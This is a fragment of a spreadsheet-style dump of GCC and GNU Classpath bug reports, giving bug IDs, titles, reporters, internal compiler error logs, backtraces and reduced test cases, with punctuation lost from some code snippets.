000000010011C000         24K rwx--  /export/vol/gcc/obj/SunOS-sparc/gcc-4.5.0-20091102/11-gcc/gcc/testsuite/gnat/null_pointer_deref1.exe
0000000100122000       2936K rwx--    [ heap ]
0000000100400000     933888K rwx--    [ heap ]
7FFFFFFF7F460000          8K rwxs-    [ anon ]
7FFFFFFF7F500000         24K rwx--    [ anon ]
7FFFFFFF7F600000          8K rwx--    [ anon ]
7FFFFFFF7F700000          8K r-x--  /platform/sun4u-us3/lib/sparcv9/libc_psr/libc_psr_hwcap1.so.1
7FFFFFFF7F800000       1312K r-x--  /lib/sparcv9/libc.so.1
7FFFFFFF7FA48000         40K rwx--  /lib/sparcv9/libc.so.1
7FFFFFFF7FA52000          8K rwx--  /lib/sparcv9/libc.so.1
7FFFFFFF7FB00000          8K rwx--    [ anon ]
7FFFFFFF7FC00000          8K rw---    [ anon ]
7FFFFFFF7FD00000          8K rw---    [ anon ]
7FFFFFFF7FE00000        224K r-x--  /lib/sparcv9/ld.so.1
7FFFFFFF7FF38000         16K rwx--  /lib/sparcv9/ld.so.1
7FFFFFFF7FF3C000          8K rwx--  /lib/sparcv9/ld.so.1
FFFFFFFCF5C00000   10653696K rw---    [ stack ]
         total     11592344K
Unfortunately I haven't been able to get a stacktrace with pstack nor with
gdb 6.6 (quite old now admittedly).  Since this breaks all testing I've moved
the source out of the way for now.</t>
  </si>
  <si>
    <t>GCC-32152</t>
  </si>
  <si>
    <t>omp lowering creates mismatched types</t>
  </si>
  <si>
    <t>For gcc.dg/gomp/atomic-6.c we create (x86_64)
  D.2052 = (unsigned int) D.2043
  D.2056 = (unsigned int) D.2044
  D.2057 = (unsigned int) D.2043
  D.2058 = __sync_val_compare_and_swap_4 (D.2051 D.2057 D.2056)
  D.2043 = (int) D.2058
  if (D.2043 != D.2052)
which compares a signed integer against an unsigned one.</t>
  </si>
  <si>
    <t>GCC-23412</t>
  </si>
  <si>
    <t>[data deps] Overflow problem in Omega</t>
  </si>
  <si>
    <t>This pattern shows something strange in the results of Omega.
Looking at the step of array accesses it seems like Omega has 
just no mechanism to handle -1 evolutions i.e. 0ffffffff in 
unsigned with modulo arithmetics.  This occurs in 
gcc/gcc/real.c during bootstrap on amd64-linux.
Dist vectors from the first dependence analyzer:
   1    1 
Omega dist vectors are not the same:
  -1    0 
Data dependence relation is:
(Data Dep: 
  access_fn_A: {1 + 4294967295}_5
  access_fn_B: {2 + 4294967295}_5
 (subscript 
  iterations_that_access_an_element_twice_in_A: {0 + 1}_1
  last_conflict: 1
  iterations_that_access_an_element_twice_in_B: {1 + 1}_1
  last_conflict: 1
  (Subscript distance: 1
  )
 )
  distance_vect:     -1    0 
  direction_vect:     -    =
)</t>
  </si>
  <si>
    <t>sebastian.pop</t>
  </si>
  <si>
    <t>GCC-24483</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in ivopts</t>
  </si>
  <si>
    <t>Take the following code:
int f ()
{       int j0 j1 j2 j3 j4 j5 j6 j7 j8 j9 a
        a = 0
        for (j0 = 0 j0 &lt; 2 j0 ++)
        for (j1 = j0 j1 &lt; 2 j1 ++)
        for (j2 = j1 j2 &lt; 2 j2 ++)
        for (j3 = j2 j3 &lt; 2 j3 ++)
        for (j4 = j3 j4 &lt; 2 j4 ++)
        for (j5 = j4 j5 &lt; 2 j5 ++)
        for (j6 = j5 j6 &lt; 2 j6 ++)
        for (j7 = j6 j7 &lt; 2 j7 ++)
        for (j8 = j7 j8 &lt; 2 j8 ++)
        for (j9 = j8 j9 &lt; 2 j9 ++)
        a += j0 + j1 + j2 + j3 + j4 + j5 + j6 + j7 + j8 + j9
        return a
}
---
Right now we ICE:
t.c:2: internal compiler error: in aff_combination_to_tree at tree-ssa-loop-ivopts.c:2948
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This was generated with the awk script from PR 18595.</t>
  </si>
  <si>
    <t>GCC-71397</t>
  </si>
  <si>
    <t>array captured as nullptr</t>
  </si>
  <si>
    <t>Created attachment 38635
preprocessored main.cpp file
Bug description:
Lambda function foo is expected not to throw exception but it does (i.e. captured a is unexpectedly equal to nullptr).
If aux defenition change from 
const auto aux = [param] () {} 
to
const auto aux = [ 
 then exception will not be throwed - as expected.
command line:
g++ -std=c++11 main.cpp
g++ -v output:
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/5/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 5.3.0-3ubuntu1~14.04' --with-bugurl=file:///usr/share/doc/gcc-5/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr --program-suffix=-5 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=gcc4-compatible --disable-libstdcxx-dual-abi --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-5-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-5-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-5-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 5.3.0 20151204 (Ubuntu 5.3.0-3ubuntu1~14.04)</t>
  </si>
  <si>
    <t>zoidbergx</t>
  </si>
  <si>
    <t>GCC-60898</t>
  </si>
  <si>
    <t>[4.8/4.9/5 Regression] model compile error with gfortran 4.7 and gcc 4.9</t>
  </si>
  <si>
    <t>mpif90 -ffree-form  -O3  -fno-second-underscore -fno-range-check -I /home/model/comGSI_v3.2/include -I /usr/local/netcdf/include  -DLINUX -DMACOS -DPGI -c plib8b.f90 
plib8b.f90:1902:0: internal compiler error: Segmentation fault: 11^M
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: [plib8b.o] Error 1 (ignored)
..........
Here is the error information I have tried it with gfortran 4.8 and got the same result. Could anyone let me know what is the problem about it? The entire log file is in the attachment. 
Any advise will be appreciate. Thank you so much.</t>
  </si>
  <si>
    <t>shaojuncycle</t>
  </si>
  <si>
    <t>GCC-51472</t>
  </si>
  <si>
    <t>ICE: verify_gimple failed: invalid rhs for gimple memory store with -fgnu-tm --param tm-max-aggregate-size=32</t>
  </si>
  <si>
    <t>Created attachment 26030
reduced testcase
Compiler output:
$ gcc -O -fgnu-tm --param tm-max-aggregate-size=32 testcase.c         
testcase.c: In function 'foo':
testcase.c:5:1: error: invalid rhs for gimple memory store
tm_save.3_10
*p_1
# .MEM_13 = VDEF 
tm_save.3_10 = *p_1
testcase.c:5:1: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r182098 - crash</t>
  </si>
  <si>
    <t>GCC-68564</t>
  </si>
  <si>
    <t>Ada fails to bootstrap on sparc64-linux-gnu</t>
  </si>
  <si>
    <t>trying to cross-build sparc64-linux-gnu ada with the gcc-5-branch 20151125 on a x86_64-linux-gnu host I get a build error building gnatlib
/scratch/packages/cross/5/p/gcc-5-cross-ports-1/gcc/build/./gcc/xgcc -B/scratch/packages/cross/5/p/gcc-5-cross-ports-1/gcc/build/./gcc/ -B/usr/sparc64-linux-gnu/bin/ -B/usr/sparc64-linux-gnu/lib/ -isystem /usr/sparc64-linux-gnu/include -isystem /usr/sparc64-linux-gnu/sys-include -isystem /scratch/packages/cross/5/p/gcc-5-cross-ports-1/gcc/build/sys-include    -c -g -O2   -W -Wall -gnatpg -nostdinc   a-cfinve.adb -o a-cfinve.o
a-cfinve.ads:240:04: warning: in instantiation at a-coboho.adb:47
a-cfinve.ads:240:04: warning: types for unchecked conversion have different sizes
../gcc-interface/Makefile:321: recipe for target 'a-cfinve.o' failed
make[8]: *** [a-cfinve.o] Error 1
make[8]: Leaving directory '/scratch/packages/cross/5/p/gcc-5-cross-ports-1/gcc/build/gcc/ada/rts'
gcc-interface/Makefile:2667: recipe for target 'gnatlib' failed
make[7]: *** [gnatlib] Error 2
make[7]: Leaving directory '/scratch/packages/cross/5/p/gcc-5-cross-ports-1/gcc/build/gcc/ada'
gcc-interface/Makefile:2744: recipe for target 'gnatlib-shared-dual' failed
make[6]: *** [gnatlib-shared-dual] Error 2</t>
  </si>
  <si>
    <t>GCC-4282</t>
  </si>
  <si>
    <t>bug in isdn4k-utils/capi20capi20/capi20.c</t>
  </si>
  <si>
    <t>gcc -v -save-temps -DPACKAGE=\libcapi20\ -DVERSION=\2.0.5\ -DSTDC_HEADERS=1 -DHAVE_FCNTL_H=1 -DHAVE_SYS_IOCTL_H=1 -DHAVE_UNISTD_H=1 -DHAVE_LINUX_CAPI_H=1 -DHAVE_SELECT=1 -I. -I. -g -O2 -c  -fPIC -DPIC capi20.c &gt;bug.report
Reading specs from /usr/lib/gcc-lib/ppc-redhat-linux/2.95.3/specs
gcc version 2.95.3 19991030 (prerelease/franzo)
GNU CPP version 2.95.3 19991030 (prerelease/franzo) (PowerPC GNU/Linux)
#include ... search starts here:
#include  search starts here:
 .
 /usr/local/include
 /usr/lib/gcc-lib/ppc-redhat-linux/2.95.3/../../../../ppc-redhat-linux/include
 /usr/lib/gcc-lib/ppc-redhat-linux/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/ppc-redhat-linux/2.95.3/../../../../include/g++-3
End of omitted list.
 /usr/lib/gcc-lib/ppc-redhat-linux/2.95.3/cc1 capi20.i -quiet -dumpbase capi20.c -g -O2 -version -fPIC -o capi20.s
GNU C version 2.95.3 19991030 (prerelease/franzo) (ppc-redhat-linux) compiled by GNU C version 2.95.3 19991030 (prerelease/franzo).
capi20.c: In function `capi20_put_message':
capi20.c:228: warning: cast to pointer from integer of different size
capi20.c: In function `capi20_get_message':
capi20.c:305: Internal compiler error:
capi20.c:305: Internal compiler error in `emit_no_conflict_block' at optabs.c:2798
Please submit a full bug report.
See  for instructions.
Release:
unknown</t>
  </si>
  <si>
    <t>ttauchi</t>
  </si>
  <si>
    <t>GCC-59527</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: in fixup_reorder_chain at cfgrtl.c:3739 during PGO Firefox build</t>
  </si>
  <si>
    <t>src % /var/tmp/gcc_test/usr/local/bin/g++ -w -r -nostdlib -o js -flto=4 -fprofile-use -fprofile-correction -march=native -fno-rtti -fno-exceptions -fno-math-errno -std=gnu++0x -pthread -pipe -O3 Unified_cpp_9.ii
...
/var/tmp/mozilla-central/js/src/vm/Stack.cpp: In member function â€˜operator++â€™:
/var/tmp/mozilla-central/js/src/vm/Stack.cpp:717:1: internal compiler error: in fixup_reorder_chain at cfgrtl.c:3739
 }
 ^
0x5b594c fixup_reorder_chain
        ../../gcc/gcc/cfgrtl.c:3738
0x5b594c cfg_layout_finalize()
        ../../gcc/gcc/cfgrtl.c:4295
0xd42eb2 duplicate_computed_gotos
        ../../gcc/gcc/bb-reorder.c:2492
0xd42eb2 execute
        ../../gcc/gcc/bb-reorder.c:2524
Please submit a full bug report
-fno-reorder-blocks-and-partition fixes the issue.
I'm currently reducing this further.</t>
  </si>
  <si>
    <t>GCC-63966</t>
  </si>
  <si>
    <t>[5 regression] inconsistent operand constraints compiling build libcpp</t>
  </si>
  <si>
    <t>Bootstrapping Darwin/i386 (non-default 32-bit configuration) with gcc 4.9.1 
FAILs compiling the stage1 build libcpp:
g++ -m32  -I/vol/gcc/src/hg/trunk/local/libcpp -I. -I/vol/gcc/src/hg/trunk/local/libcpp/../include -I/vol/gcc/src/hg/trunk/local/libcpp/include  -g -O2 -W -Wall -Wno-narrowing -Wwrite-strings -Wmissing-format-attribute -pedantic -Wno-long-long  -fno-exceptions -fno-rtti -I/vol/gcc/src/hg/trunk/local/libcpp -I. -I/vol/gcc/src/hg/trunk/local/libcpp/../include -I/vol/gcc/src/hg/trunk/local/libcpp/include   -c -o lex.o -MT lex.o -MMD -MP -MF .deps/lex.Tpo /vol/gcc/src/hg/trunk/local/libcpp/lex.c
In file included from /vol/gcc/src/hg/trunk/local/libcpp/lex.c:474:0:
/vol/gcc/src/hg/trunk/local/libcpp/../gcc/config/i386/cpuid.h: In function 'void _cpp_init_lexer()':
/vol/gcc/src/hg/trunk/local/libcpp/../gcc/config/i386/cpuid.h:209:46: error: inconsistent operand constraints in an 'asm'
   __cpuid (__ext __eax __ebx __ecx __edx)
                                              ^
/vol/gcc/src/hg/trunk/local/libcpp/../gcc/config/i386/cpuid.h:232:52: error: inconsistent operand constraints in an 'asm'
   __cpuid (__level *__eax *__ebx *__ecx *__edx)
                                                    ^
make: *** [lex.o] Error 1
This was caused by the following patch:
2014-10-17  Uros Bizjak  
	* config/i386/cpuid.h (__cpuid): Remove definitions that handle %ebx
	register in a special way.
	(__cpuid_count): Ditto.
	* config/i386/driver-i386.h: Protect with
	#if defined(__GNUC__) &amp;&amp; (__GNUC__ &gt;= 5 || !defined(__PIC__)).
	(host_detect_local_cpu): Mention that GCC with non-fixed %ebx
	is required to compile the function.
Darwin/x86_64 isn't affected.
  Rainer</t>
  </si>
  <si>
    <t>GCC-49704</t>
  </si>
  <si>
    <t>gcc/cp/semantics.c: unexpected ast</t>
  </si>
  <si>
    <t>I can't see much sense in the translatable string unexpected ast of kind %s. Maybe cast is meant? Otherwise please state a description for translators. Thanks!</t>
  </si>
  <si>
    <t>GCC-34095</t>
  </si>
  <si>
    <t>parallel mode: segfault in std::sort</t>
  </si>
  <si>
    <t>I tried to figure out what is going on here but it's getting
to complicated in the libstdc++ innards for me to spot the problem.
In any case this little program
-------------------
#include 
#include 
struct S
{
    unsigned int line
    std::vector entries
    bool operator &lt; (const S &amp;a) const
      {
	return line &lt; a.line
      }      
}
int main () 
{
  std::vector lines(20000)  
  std::sort (lines.begin() lines.end())
}
------------------------
produces a segfault for me when compiled with parallel mode.
A backtrace is here:
(gdb) bt
#0  0x0805cf59 in ~vector (this=0xb6439ffc)
    at /tmp/bangerth/bin/gcc-mainline/lib/gcc/i686-pc-linux-gnu/4.3.0/../../../../include/c++/4.3.0/bits/stl_vector.h:304
#1  0x0805cf9d in ~S (this=0xb6439ff8) at step-14.cc:5
#2  0x0806d1b9 in __gnu_parallel::parallel_sort_mwms_pu &gt; &gt; std::less &gt; (
    d=0x807722c comp=@0xbfffd498)
    at /tmp/bangerth/bin/gcc-mainline/lib/gcc/i686-pc-linux-gnu/4.3.0/../../../../include/c++/4.3.0/parallel/multiway_mergesort.h:312
#3  0x08057c73 in __gnu_parallel::parallel_sort_mwms &gt; &gt; std::less &gt; (
    .omp_data_i=0xbfffd450)
    at /tmp/bangerth/bin/gcc-mainline/lib/gcc/i686-pc-linux-gnu/4.3.0/../../../../include/c++/4.3.0/parallel/multiway_mergesort.h:391
#4  0xb6dd03e0 in gomp_thread_start (xdata=0xbfffd330)
    at ../../../svn/libgomp/team.c:108
#5  0xb6db2aa7 in start_thread () from /lib/tls/libpthread.so.0
This is in the worker thread not the main thread from which it was spawned.
Hope this helps cheers
 W.</t>
  </si>
  <si>
    <t>GCC-47331</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE in make_decl_rtl at varasm.c:1133 (with -fopenmp)</t>
  </si>
  <si>
    <t>Created attachment 22996
reproducer
Compiling the attached test case with:
gfortran-4.6-010811 -ffixed-form -cpp -ffixed-line-length-132 -fopenmp -c -o test-ice.o test-ice.f
results in:
test-ice.f: In function â€˜wrtâ€™:
test-ice.f:34:0: internal compiler error: in make_decl_rtl at varasm.c:1133
Please submit a full bug report
Note that -fopenmp is required.
I have not yet had time to try the latest snapshot and do not currently build trunk directly from svn.
This was found using the 08-Jan-2011 snapshot built with:
gfortran-4.6-010811 -v
Using built-in specs.
COLLECT_GCC=gfortran-4.6-010811
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.6-20110108/configure --prefix=/usr/local --libdir=/usr/local/lib64 --program-suffix=-4.6-010811 --with-arch=corei7 --enable-languages=cc++fortran --enable-gold --enable-version-specific-runtime-libs --enable-checking=release --with-system-zlib --enable-linux-futex --without-system-libunwind --with-ppl=/usr/lib64 --with-cloog=/usr/lib64 --enable-lto
Thread model: posix
gcc version 4.6.0 20110108 (experimental) (GCC)</t>
  </si>
  <si>
    <t>fago</t>
  </si>
  <si>
    <t>GCC-39997</t>
  </si>
  <si>
    <t>Procedure() pointer  &amp; implicit typing: rejects-valid / accepts-invalid?</t>
  </si>
  <si>
    <t>This is a tracking bug. It partially applies directly and partially for the almost ready proc-pointer components patch.
I first ask ask comp.lang.fortran but Richard Maine's reply was that he sees the problem but feels he cannot answer it:
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/a48b6b038baabd90
I then asked at the J3 mailing list:
http://j3-fortran.org/pipermail/j3/2009-May/002736.html</t>
  </si>
  <si>
    <t>GCC-52547</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE with openmp with nested function which requires a trampoline</t>
  </si>
  <si>
    <t>Created attachment 26868
Preprocessed Source
I get the following error when trying to compile a piece of software. Commenting out the call to qsort in the original source file (the corresponding line number in the attached preprocessed file is 7176) does not produce any error.
gcc -std=gnu9x -fopenmp   -g -O2 -Iinclude -o main main.c src/stinger.c src/stinger-utils.c src/timer.c src/xmalloc.c \
		 -lm -lrt
src/stinger-utils.c: In function â€˜stinger_to_sorted_csrâ€™:
src/stinger-utils.c:450:13: internal compiler error: in create_tmp_var at gimplify.c:465
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccAzPZP8.out file please attach this to your bugreport.
make: *** [main] Error 1</t>
  </si>
  <si>
    <t>iamrohitbanga</t>
  </si>
  <si>
    <t>CLASSPATH-22882</t>
  </si>
  <si>
    <t>wrong names returned java.io.InputStreamReader.getEncoding() when using NIO charsets</t>
  </si>
  <si>
    <t xml:space="preserve">Due to a quick fix a problem was introduced that causes java.io.InputStreamReader.getEncoding() to not return the right encoding name (according to http://java.sun.com/j2se/1.5.0/docs/guide/intl/encoding.doc.html) when the InputStreamReader instance was created using the
(InputStream Charset) or (InputStream CharsetDecoder) constructors.
If corrected the output for e.g. ISO-8859_1 would be the following:
cs2 = Charset.forName(latin1)
isr = new InputStreamReader(someInputStreamInstance cs2)
print(isr.getEncoding())
ISO8859_1
print(cs2.name())
ISO-8859-1
currently isr.getEncoding().equals(cs2.name()) holds which is not right according to the specification given in the URL.
</t>
  </si>
  <si>
    <t>GCC-63241</t>
  </si>
  <si>
    <t>Internal error in gimplify_init_constructor when using constexr and multidimensional arrays</t>
  </si>
  <si>
    <t>I stumbled upon a weird regression bug. The test case below is working fine with GCC 4.8 and 4.9.0 but triggers an internal error on 4.9.1. I haven't tested 4.9.2.
Any of these modifications would remove the error:
- removing `constexpr` from the constructor at line 2
- using `0` instead of `i` in the second array element constructor at line 8
- using `const int i` instead of `int i` at line 6
- using a 1D array instead of a 2D array at line 7
So I believe the example below cannot be reduced further.
However somehow the combination of `constexpr` constructor and multidimensional array is causing the compiler to crash.
Details:
* GCC version: 4.9.1 built with default config
* System: x86_64 GNU/Linux
* Command line: c++ -std=c++11 bug.cpp
* Minimal example:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
struct A {
  constexpr A(int){}
}
int main() {
  int i = 1
  A array[2][2] =
    {{{0} {i}}
     {{0} {0}}}
}
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
* Output:
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
bug.cpp: In function â€˜int main()â€™:
bug.cpp:9:16: internal compiler error: in gimplify_init_constructor at gimplify.c:4007
      {{0} {0}}}
                ^
0x7f6213 gimplify_init_constructor
        ../.././gcc/gimplify.c:4007
0x7f6dee gimplify_modify_expr_rhs
        ../.././gcc/gimplify.c:4167
0x7f6ec4 gimplify_modify_expr
        ../.././gcc/gimplify.c:4486
0x7f7dda gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../.././gcc/gimplify.c:7627
0x7facd6 gimplify_stmt(tree_node** gimple_statement_base**)
        ../.././gcc/gimplify.c:5373
0x7f806a gimplify_cleanup_point_expr
        ../.././gcc/gimplify.c:5149
0x7f806a gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../.././gcc/gimplify.c:7990
0x7facd6 gimplify_stmt(tree_node** gimple_statement_base**)
        ../.././gcc/gimplify.c:5373
0x7f8d3b gimplify_statement_list
        ../.././gcc/gimplify.c:1432
0x7f8d3b gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../.././gcc/gimplify.c:8042
0x7facd6 gimplify_stmt(tree_node** gimple_statement_base**)
        ../.././gcc/gimplify.c:5373
0x7f806a gimplify_cleanup_point_expr
        ../.././gcc/gimplify.c:5149
0x7f806a gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../.././gcc/gimplify.c:7990
0x7facd6 gimplify_stmt(tree_node** gimple_statement_base**)
        ../.././gcc/gimplify.c:5373
0x7f8d3b gimplify_statement_list
        ../.././gcc/gimplify.c:1432
0x7f8d3b gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../.././gcc/gimplify.c:8042
0x7facd6 gimplify_stmt(tree_node** gimple_statement_base**)
        ../.././gcc/gimplify.c:5373
0x7fb56b gimplify_bind_expr
        ../.././gcc/gimplify.c:1099
0x7f7fc0 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../.././gcc/gimplify.c:7824
0x7facd6 gimplify_stmt(tree_node** gimple_statement_base**)
        ../.././gcc/gimplify.c:5373
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</t>
  </si>
  <si>
    <t>thibaut.lutz</t>
  </si>
  <si>
    <t>CLASSPATH-27917</t>
  </si>
  <si>
    <t>Massive memory leak in Graphics2D image operations</t>
  </si>
  <si>
    <t>My image viewer application shows a massive memory leak when running on jamvm with classpath cvs (2006.06.06) - about 10..30 MBytes of memory per medium-sized image. 
Goto http://tams-www.informatik.uni-hamburg.de/personal/hendrich/niffler/
and download niffler.jar and optionally the sources. Run the jar and specify
the name of a directory with lots of images in it:
jamvm -jar niffler.jar /home/hendrich/images/
The app should start up now (note that it also might just crash immediately
after the first repaint jamvm just hangs) and displays the first image.
Move the mouse over the image activate the popup menu and deselect 
popup &gt; thumbnails &gt; enable thumbnails because creating the thumbnails 
may take a long time.
Open the popup menu and select popup &gt; slideshow &gt; start slideshow (linear)
or type F9. Optionally type i or select popup &gt; slideshow &gt; half interval
to reduce the delay between images.
Observe memory consumption...
I have no simple testcase yet because some image operations seem to happen asynchronously. I suspect that the loaded images are never garbage-collected.
(It also might be the scaled image drawImage(x y w h x y w h) but this seems
to work in my circuit simulator.)</t>
  </si>
  <si>
    <t>GCC-32260</t>
  </si>
  <si>
    <t>[4.3 Regression] too many warning: dereferencing type-punned pointer will break strict-aliasing rules</t>
  </si>
  <si>
    <t>The following code compiled with -O2 -Wall (g++ 4.3 as of 20070607)
produces the following unexpected/annoying warning:
test_typeinfo.cpp: In function 'int main()':
test_typeinfo.cpp:5: warning: dereferencing type-punned pointer will break strict-aliasing rules
test_typeinfo.cpp:5: warning: unused variable 't'
~&gt; cat test_typeinfo.cpp 
#include 
int main()
{
  const std::type_info 
}
Is this really meant to warn for such a code???</t>
  </si>
  <si>
    <t>GCC-25115</t>
  </si>
  <si>
    <t>[4.2 Regression] Segmentation fault in pre_insert_copy_insn</t>
  </si>
  <si>
    <t>The mainline compiler for sh4-*-linux-gnu segfaults with -O2 on
the program:
struct state
{
  int retrans
  int retry
  int options
  char pad[4]
}
extern __thread struct state *res
  __attribute__ ((tls_model (initial-exec)))
void
foo (void)
{
  if (!res-&gt;retrans)
    res-&gt;retrans = 5
  if (!res-&gt;retry)
    res-&gt;retry = 4
  if (!res-&gt;options)
    res-&gt;options = 1
}
in gcse.c:pre_insert_copy_insn.  It starts to fail after the patch
r107456:
2005-11-24  Paolo Bonzini  
	* gcse.c (hash_scan_set): Look through REG_EQUAL or REG_EQUIV notes
	also when doing PRE rather than only for global CPROP.</t>
  </si>
  <si>
    <t>GCC-15311</t>
  </si>
  <si>
    <t>Incorrect handling of A edit descriptor</t>
  </si>
  <si>
    <t>The draft standard says: (10.6.3 Character editing)
If the specified field width w for an A edit descriptor corresponding to
an output item is greater than len the output field will consist of w-len
blanks followed by the len characters from the internal value.
Currently the behaviour is such that the blanks are printed after the
value.
This defects causes miscompare in SPEC FP benchmark 189.lucas.
% cat foo.f90
program main
  character*100 s
  write(s'(a18)') hello world
  if (s.eq.       hello world) print* Ok
  if (s.eq.hello world       ) print* Wrong!
end</t>
  </si>
  <si>
    <t>GCC-33959</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in instantiate_class_template at cp/pt.c:6649</t>
  </si>
  <si>
    <t>Error also occurs in g++4.3 in 20071026 snapshot.  In that snapshot
the ice occurred on line 6651 which is a gcc_assert preceded by comment:
  /* We should never instantiate a nested class before its enclosing
     class we need to look up the nested class by name before we can
     instantiate it and that lookup should instantiate the enclosing
     class.  */
I will attach the output from make showing the error and the
.ii file (once I figure how to do that).</t>
  </si>
  <si>
    <t>cppljevans</t>
  </si>
  <si>
    <t>GCC-70905</t>
  </si>
  <si>
    <t>[7 regression] FAIL: gcc.c-torture/compile/20011219-2.c -Os (unrecognizable insn)</t>
  </si>
  <si>
    <t>$ gcc/xgcc -Bgcc/ -m32 -Os -c ../gcc/testsuite/gcc.c-torture/compile/20011219-2.c 
../gcc/testsuite/gcc.c-torture/compile/20011219-2.c: In function â€˜fooâ€™:
../gcc/testsuite/gcc.c-torture/compile/20011219-2.c:20:1: error: unrecognizable insn:
 }
 ^
(insn 74 73 75 6 (parallel [
            (set (reg:SI 31 31)
                (mem/c:SI (plus:SI (reg/f:SI 1 1)
                        (const_int 20 [0x14])) [4  S4 A8]))
        ]) ../gcc/testsuite/gcc.c-torture/compile/20011219-2.c:20 -1
     (nil))
../gcc/testsuite/gcc.c-torture/compile/20011219-2.c:20:1: internal compiler error: in extract_insn at recog.c:2287
0x1069449b _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../gcc/rtl-error.c:108
0x106944ef _fatal_insn_not_found(rtx_def const* char const* int char const*)
        ../../gcc/rtl-error.c:116
0x1065bef7 extract_insn(rtx_insn*)
        ../../gcc/recog.c:2287
0x1065d5d7 extract_constrain_insn(rtx_insn*)
        ../../gcc/recog.c:2188
0x1066a7f7 build_def_use
        ../../gcc/regrename.c:1637
0x1066a7f7 regrename_analyze(bitmap_head*)
        ../../gcc/regrename.c:738
0x1066c64f regrename_optimize
        ../../gcc/regrename.c:1892
0x1066c64f execute
        ../../gcc/regrename.c:1929</t>
  </si>
  <si>
    <t>GCC-11864</t>
  </si>
  <si>
    <t>[3.3 regression] miscompiles zero extention and test</t>
  </si>
  <si>
    <t>gcc-3.3/3.4 -O1/2 for sh target may miscompile the combination of zero extention
and test if it's zero.</t>
  </si>
  <si>
    <t>GCC-5325</t>
  </si>
  <si>
    <t>GCC-33595</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/nint_2.f90  -O0  execution test</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B/test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../ /test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/nint_2.f90   -O0   -pedantic-errors  -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libiberty  -lm   -o ./nint_2.exe    (timeout = 300)
